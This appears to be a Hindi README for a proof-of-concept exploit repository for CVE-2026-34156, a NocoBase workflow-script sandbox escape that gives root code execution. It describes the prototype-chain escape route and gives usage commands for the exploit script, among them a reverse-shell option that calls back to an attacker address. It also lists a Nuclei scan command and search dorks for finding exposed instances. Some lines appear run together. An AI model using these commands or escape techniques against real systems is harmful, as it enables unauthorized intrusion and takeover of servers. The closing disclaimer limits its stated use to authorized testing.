
CVE-2026-34156
अप्रमाणित / निम्न-विशेषाधिकार → रूट रिमोट कोड निष्पादन NocoBase में
CVE-2026-34156 NocoBase (एक ओपन-सोर्स नो-कोड/लो-कोड प्लेटफॉर्म) में एक महत्वपूर्ण सैंडबॉक्स एस्केप भेद्यता है।
एक हमलावर जो वर्कफ़्लो स्क्रिप्ट नोड बना या निष्पादित कर सकता है (कम विशेषाधिकारों के साथ भी), Node.js vm सैंडबॉक्स से बच सकता है और कंटेनर के अंदर रूट के रूप में पूर्ण रिमोट कोड निष्पादन प्राप्त कर सकता है।
@nocobase/plugin-workflow-javascript (स्क्रिप्ट नोड)console._stdout.constructor.constructor के माध्यम से सैंडबॉक्स एस्केपuid=0)fs)सैंडबॉक्स में पारित console ऑब्जेक्ट होस्ट रियल्म से है, जो हमलावरों को प्रोटोटाइप श्रृंखला पर चढ़ने और वास्तविक Function कंस्ट्रक्टर → process.mainModule.require तक पहुंचने की अनुमति देता है।
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"
# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444
रिपॉजिटरी में शामिल: पूर्ण PoC स्क्रिप्ट, Nuclei टेम्पलेट, और सुरक्षित जांचकर्ता।
nuclei -u https://target -t cves/CVE-2026-34156.yaml
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"
isolated-vm) का उपयोग करें।
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है।
केवल उन सिस्टमों पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।
अनधिकृत शोषण अवैध है।
सुरक्षा समुदाय के लिए ❤️ के साथ बनाया गया
सुरक्षित रहें। तेजी से पैच करें।